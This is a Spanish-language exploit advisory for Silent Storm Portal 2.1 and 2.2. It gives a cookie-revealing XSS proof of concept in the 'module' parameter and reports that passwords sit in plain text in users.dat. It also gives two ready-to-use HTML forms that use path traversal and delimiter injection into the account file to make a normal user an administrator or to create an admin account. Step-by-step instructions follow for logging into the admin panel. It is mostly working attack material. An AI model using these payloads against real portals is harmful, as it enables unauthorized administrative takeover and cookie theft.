Multiple Vulns en Silent Storm Portal

Software:
Silent Storm Portal

Sitio Web:
http://www.silent-storm.co.uk/ssp/


Version Afectada:
2.1,2.2

XSS vuln.

Prueba de Concepto:

http://www.victim.com/index.php?module=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E

Vuln Acceso administrativo no Autorizado:

Prueba de Concepto:

Silent Storm Portal almacena la informacion de las cuentas, username y password. en el archivo ¨users.dat¨.Este archivo contiene la informacion en texto plano.

Demostracion:
Registre una cuenta de usuario, y ejecute el siguiente exploit.html

form method="post" action="http://www.victim.com/index.php?module=../../profile" >
< input type="text" name="mail" value="any_at_mail.com">< br>
< input type="hidden" name="mail" value="< ~>1<~>" >
< input type="submit" name="post" value="Get Admin!" >
< /form

Ejemplo de Archivo de la Base de Datos(antes de la ejecucion del exploit)
Cuenta<~>password<~>mail.com<~>2<~><~><~><~><~>
Nivel:Usuario Normal

Ejemplo(despues de la ejecucion)
Cuenta<~>password<~>mail.com<~>1<~><~>2<~><~><~><~><~><~><~>
Nivel Injectado:Administrador

Usted Obtendra el mensaje ¨"Updated Your Profile Sucessfuly !" despues de la ejecucion del exploit.html.Salga y reingrese con su username y password en "AdminPanel¨(index.php?module=../../apanel ) y tendra todos los privilegios del administrador.

El siguiente es otro ejemplo de codigo, que crea directamente una cuenta de administrador en el portal de la victima:

form method="post" action="http://www.victim.com/index.php?module=../../Home">
User:< input type="text" name="usr" size="10" >< br>
Pass:< input type="password" name="pas" size="10" >< br>
< input type=hidden name="ema" value="any_at_mail.com<~>1<~>">< br>
< input type="submit" name="reg" value="Create Admin!" >
< /form


Salu2